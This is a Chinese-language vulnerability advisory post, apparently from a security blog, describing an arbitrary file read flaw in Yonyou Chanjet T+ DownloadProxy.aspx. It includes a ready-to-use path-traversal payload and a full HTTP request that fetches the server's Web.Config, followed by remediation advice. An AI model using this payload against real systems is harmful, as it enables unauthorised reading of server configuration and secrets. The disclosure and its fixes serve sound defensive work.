用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

admin 2023年6月14日18:30:58评论170 views字数 1019阅读3分23秒阅读模式

漏洞说明

畅捷通T+是一款灵动、智慧、时尚的互联网◎管理软件,主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。畅捷通T+为企业打造全新的生意模式、管理模式、工作模式。与传统管理软件相比,更强调企业管理向企业经营的转变、等级化管人向平等化用人理念的转变。

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件

影响版本

用友 畅捷通T+

漏洞复现

用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

payload:

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1Host: ip:portUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

修复建议

  1. 配置文件:在配置文件中限制访问的文件目录,比如 PHP 中 php.ini 配置 open_basedir。

  2. 特殊字符过滤:检查用户输入,过滤或转义含有 “../”、“..”、“%00”,“..”,“./”,“#” 等跳转目录或字符终止符、截断字符的输入。

  3. 合法性判断:严格过滤用户输入字符的合法性,比如文件类型、文件地址、文件内容等。

  4. 白名单:白名单限定访问文件的路径、名称及后缀名。

本文章仅用于学习交流,不得用于非法用途

星标加关注,追洞不迷路


原文始发于微信公众号(才疏学浅的H6):用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月14日18:30:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞https://cn-sec.com/archives/1806186.html

发表评论

匿名网友 填写信息